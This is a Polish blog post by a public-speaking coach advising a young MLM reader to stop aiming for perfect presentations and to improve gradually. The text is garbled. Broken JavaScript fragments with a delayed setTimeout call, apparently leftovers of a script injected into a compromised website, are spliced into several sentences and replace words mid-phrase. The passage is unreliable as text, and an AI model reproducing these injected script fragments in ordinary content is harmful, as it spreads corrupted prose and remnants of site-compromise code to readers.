Perfekcyjna prezentacja? Nie, dziękuję!

Kilka tygodni temu jeden z moich czytelników, działający w branży MLM podzielił się ze mną swoimi wątpliwościami na temat swoich prezentacji. Mówił mi, że czuje się bardzo niepewnie bo… no właśnie.

Jeśli film Ci się spodobał, kliknij proszę w ikonkę FB “Lubię dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to” Możesz także subskrybować mój kanał na You Tube i zaznaczyć przy tym opcję “powiadamiaj mnie o kolejnych filmach”. Wtedy niczego nie przegapisz!

“Robercie, nie czuję się pewnie podczas prezentacji. Wyobrażam sobie siebie jako mistrza w tym co robię a niestety tak nie jest – pisze do mnie 23-letni czytelnik mojego bloga.

Moja odpowiedź: cały problem Twojego złego samopoczucia wynika z tego, że chciałbyś wygłosić idealną, perfekcyjną prezentację a niestety tak się nie da. Zawsze będzie coś do poprawki zatem nie stawiaj sobie poprzeczki na wysokości… nieosiągalnej. Załóż, że każda następna prezentacja będzie lepsza od poprzedniej i dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to wystarczy! Paradoksalnie, gdy dążysz do mistrzostwa i perfekcji, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to może Cię paraliżować. Zamiast poprawy, możesz zauważyć u siebie regres.
Ani Ty, ani ja, nigdy nie będziemy idealnymi prezenterami, bo tacy nie istnieją. Moja rada: ucz się, doskonal warsztat, staraj się mówić coraz lepiej i… zapomnij o ideale! Jednym słowem spoko 🙂

pozdrawiam serdecznie

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

One Response

Leave a Reply